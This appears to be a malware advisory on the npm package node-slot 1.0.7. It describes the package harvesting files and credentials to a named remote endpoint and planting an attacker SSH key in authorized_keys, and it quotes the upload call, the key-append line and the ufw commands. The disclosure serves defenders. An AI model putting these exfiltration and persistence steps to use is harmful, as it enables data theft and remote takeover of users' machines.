node-slot 1.0.7 contacts https://datasecure-service.vercel.app/api/v1 to retrieve scan and block patterns, then walks the user's home directory (or non-C: drives on Windows) for files matching extensions such as.env,.json,.toml,.pdf,.docx and uploads them via multipart POST (axios.post(UPLOAD_URL, form,...) at index.js:78) along with the OS username and platform. On Linux it additionally fetches an attacker-supplied SSH public key from /api/ssh-key and appends it to ~/.ssh/authorized_keys (fs.appendFileSync(authKeys, sshKey + "\n", { mode: 0o600 })), then runs sudo ufw enable and sudo ufw allow 22/tcp to ensure the operator can reach the SSH service — granting persistent remote shell access to the installer's machine. Server-controlled scan/block patterns let the operator retarget the harvester without republishing. package.json has empty author/description and lists Node built-in names (child_process, os) as fake dependencies — disguise consistent with a deliberately malicious package.